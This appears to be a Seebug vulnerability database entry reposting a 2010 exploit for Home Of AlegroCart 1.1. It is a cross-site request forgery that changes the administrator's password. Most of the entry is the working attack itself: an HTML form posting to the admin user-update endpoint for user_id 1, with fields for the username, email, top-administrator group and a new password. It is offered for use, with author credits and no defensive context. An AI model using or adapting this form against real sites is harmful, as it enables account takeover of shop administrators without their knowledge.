Home Of AlegroCart 1.1 - CSRF Change Administrator Password

2014-07-01T00:00:00
ID SSV:67611
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

0 0 0 0

                                        
                                            
                                                [#]----------------------------------------------------------------[#]
#
# [+] Home Of AlegroCart v1.1 - [ Xsrf] Change Administrator Password
#
# // Author Info
# [x] Author: The.Morpheus
# [x] Contact: fats0L@windowslive.com<mailto:fats0L@windowslive.com>
# [x] Thanks: T�rksec.İnfo ~ Nd And Tg Tayfa :P
# [x] Date : 01.02.2010
#
[#]-------------------------------------------------------------------------------------------[#]
 
# Download : http://forum.alegrocart.com/viewtopic.php?f=8&t=4
 
# [x] Exploit :
#
# [ XSRF ]
#
# [ Login ]
# http://[server]/[path]/admin/
#
# // Start XSRF
|-------------------------------------------------------------------------------|
 
<form action="http://server/admin/?controller=user&user_id=1&action=update;action=update" method="post" enctype="multipart/form-data" id="form">
width="185"><span class="required">*</span> Username:</td>
<input type="text" name="username" value="admin">
<span class="required">*</span> First Name:</td>
<input type="text" name="firstname" value="admin">
<span class="required">*</span> Last Name:</td>
<input type="text" name="lastname" value="admin">
<td>E-Mail:</td>
<input type="text" name="email" value="admin"></td>
<td>User Group:</td>
<td><select name="user_group_id">
<option value="1" selected>Top Administrator</option>
</select></td>
<td>Password:</td>
<input type="password" name="password" value="" >
<td>Confirm:</td>
<input type="password" name="confirm" value="">
</form>
 
 
|-------------------------------------------------------------------------------|
# // End of attack ~
#
[#]------------------------------------------------------------------------------------------[#]